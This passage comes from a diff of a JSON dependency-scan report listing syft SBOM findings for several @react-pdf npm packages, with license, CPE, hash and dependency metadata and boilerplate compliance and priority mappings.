+ "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/primitives 3.1.1", + "title": "@react-pdf/primitives 3.1.1", + "description": "Package discovered: @react-pdf/primitives 3.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "18694a13e91dacfb", + "name": "@react-pdf/primitives", + "version": "3.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:3.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/primitives@3.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/primitives/-/primitives-3.1.1.tgz", + "integrity": "sha512-miwjxLwTnO3IjoqkTVeTI+9CdyDggwekmSLhVCw+a/7FoQc+gF3J2dSKwsHvAcVFM0gvU8mzCeTofgw0zPDq0w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2743499890ec5e22", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/primitives 4.3.0", + "title": "@react-pdf/primitives 4.3.0", + "description": "Package discovered: @react-pdf/primitives 4.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "edf229ed71e6ba52", + "name": "@react-pdf/primitives", + "version": "4.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/primitives:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/primitives:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/primitives@4.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/primitives/-/primitives-4.3.0.tgz", + "integrity": "sha512-nYXoZ36pvwNzbc54+DbL8RCn15jU7woJ9D/svnh5tpUXekJ+CbI4mZLo6boSv24CvJgychOu6h7gxX03B4ps0A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ea34747c8a1e8321", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/render 3.5.0", + "title": "@react-pdf/render 3.5.0", + "description": "Package discovered: @react-pdf/render 3.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3e1fba314601b9a8", + "name": "@react-pdf/render", + "version": "3.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/render:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/render:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/render:3.5.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/render@3.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/render/-/render-3.5.0.tgz", + "integrity": "sha512-gFOpnyqCgJ6l7VzfJz6rG1i2S7iVSD8bUHDjPW9Mze8TmyksHzN2zBH3y7NbsQOw1wU6hN4NhRmslrsn+BRDPA==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/fns": "2.2.1", + "@react-pdf/primitives": "^3.1.1", + "@react-pdf/textkit": "^4.4.1", + "@react-pdf/types": "^2.6.0", + "abs-svg-path": "^0.1.1", + "color-string": "^1.9.1", + "normalize-svg-path": "^1.1.0", + "parse-svg-path": "^0.1.2", + "svg-arc-to-cubic-bezier": "^3.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9ecea192844aa50b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/renderer 3.4.5", + "title": "@react-pdf/renderer 3.4.5", + "description": "Package discovered: @react-pdf/renderer 3.4.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d2a573a75d297737", + "name": "@react-pdf/renderer", + "version": "3.4.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/renderer:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/renderer:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/renderer:3.4.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/renderer@3.4.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/renderer/-/renderer-3.4.5.tgz", + "integrity": "sha512-O1N8q45bTs7YuC+x9afJSKQWDYQy2RjoCxlxEGdbCwP+WD5G6dWRUWXlc8F0TtzU3uFglYMmDab2YhXTmnVN9g==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/font": "^2.5.2", + "@react-pdf/layout": "^3.13.0", + "@react-pdf/pdfkit": "^3.2.0", + "@react-pdf/primitives": "^3.1.1", + "@react-pdf/render": "^3.5.0", + "@react-pdf/types": "^2.6.0", + "events": "^3.3.0", + "object-assign": "^4.1.1", + "prop-types": "^15.6.2", + "queue": "^6.0.1", + "scheduler": "^0.17.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "25636a50f9953390", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/stylesheet 4.3.0", + "title": "@react-pdf/stylesheet 4.3.0", + "description": "Package discovered: @react-pdf/stylesheet 4.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "618f90b9a2f3d884", + "name": "@react-pdf/stylesheet", + "version": "4.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:4.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/stylesheet@4.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-4.3.0.tgz", + "integrity": "sha512-x7IVZOqRrUum9quuDeFXBveXwBht+z/6B0M+z4a4XjfSg1vZVvzoTl07Oa1yvQ/4yIC5yIkG2TSMWeKnDB+hrw==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/fns": "2.2.1", + "@react-pdf/types": "^2.6.0", + "color-string": "^1.9.1", + "hsl-to-hex": "^1.0.0", + "media-engine": "^1.0.3", + "postcss-value-parser": "^4.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "97286ac4a749af60", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/stylesheet 6.2.1", + "title": "@react-pdf/stylesheet 6.2.1", + "description": "Package discovered: @react-pdf/stylesheet 6.2.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ff4544477cbe31d7", + "name": "@react-pdf/stylesheet", + "version": "6.2.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/stylesheet:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/stylesheet:6.2.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/stylesheet@6.2.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/stylesheet/-/stylesheet-6.2.1.tgz", + "integrity": "sha512-2+UEk+7e+z8baaWi2l5kPLWmwtJeOI+T5wW9GGeN3iDH7vd3kbTqOpN1yt9mmfNVZFxQsnDHpznFb5v5UF983A==", + "dependencies": { + "@react-pdf/fns": "3.1.3", + "@react-pdf/types": "^2.11.1", + "color-string": "^2.1.4", + "hsl-to-hex": "^1.0.0", + "media-engine": "^1.0.3", + "postcss-value-parser": "^4.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "aac5b1fed64c15db", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/textkit 4.4.1", + "title": "@react-pdf/textkit 4.4.1", + "description": "Package discovered: @react-pdf/textkit 4.4.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9a502dcbe994e863", + "name": "@react-pdf/textkit", + "version": "4.4.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react-pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/textkit:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react_pdf\\/textkit:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react-pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:\\@react:\\@react_pdf\\/textkit:4.4.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/%40react-pdf/textkit@4.4.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/@react-pdf/textkit/-/textkit-4.4.1.tgz", + "integrity": "sha512-Jl9wdTqIvJ5pX+vAGz0EOhP7ut5Two9H6CzTKo/YYPeD79cM2yTXF3JzTERBC28y7LR0Waq9D2LHQjI+b/EYUQ==", + "dependencies": { + "@babel/runtime": "^7.20.13", + "@react-pdf/fns": "2.2.1", + "bidi-js": "^1.0.2", + "hyphen": "^1.6.4", + "unicode-properties": "^1.4.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d6967341a8bbb112", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: @react-pdf/types 2.11.1", + "title": "@react-pdf/types 2.11.1", + "description": "Package discovered: @react-pdf/types 2.11.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + 